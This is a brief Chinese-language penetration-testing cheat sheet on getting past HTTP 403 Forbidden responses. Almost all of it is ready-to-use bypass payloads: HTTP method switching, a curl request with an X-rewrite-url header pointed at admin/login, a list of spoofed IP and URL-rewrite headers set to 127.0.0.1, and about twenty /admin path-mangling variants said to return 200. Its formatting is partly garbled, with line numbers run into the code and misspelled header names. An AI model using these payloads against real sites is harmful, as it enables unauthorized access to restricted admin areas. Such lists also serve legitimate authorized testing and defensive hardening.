渗透测试时如何利用403页面
什么是403
- 没有权限访问
- 服务器处理了但是拒绝了这次请求
遇到403页面应该怎么办呢?以下我们列出几种常见的方法。
修改请求方法
1
GET → POST, GET → TRACE, GET → PUT, GET → OPTION
效果展示
Get
1
2
3GET /api
Response
HTTP/1.1 403Post
1
2
3
4POST /api
X-Forwared-Host: 127.0.0.1
Response
HTTP/1.1 200 OK
USing CURL
1
curl -i -s -k -X $'GET' -H $'Host: example.com' -H $'X-rewrite-url: admin/login' $'https://example.com/'
向请求模块添加头信息
1
2
3
4
5
6
7
8
9
10
11
12ReFerer:https://xxx/auth/login
X-rewrite-url: 127.0.0.1
X-Original-URL: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1扩展名绕过
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
site.com/admin => 403
site.com/admin/ => 200
site.com/admin/*/ => 200
site.com/admin// => 200
site.com//admin// => 200
site.com/admin/* => 200
site.com/admin/. => 200
site.com/admin/./ => 200
site.com/./admin/./ => 200
site.com/admin/./. => 200
site.com/admin? => 200
site.com/admin/./. => 200
site.com/admin??? => 200
site.com/admin..;/ => 200
site.com/%2f/admin => 200
site.com/%2e/admin => 200
site.com/admin?? => 200
site.com/admin%09/ => 200
site.com/admin%20/ => 200
site.com/admin/..;/ => 200
site.com/%20admin%20/ => 200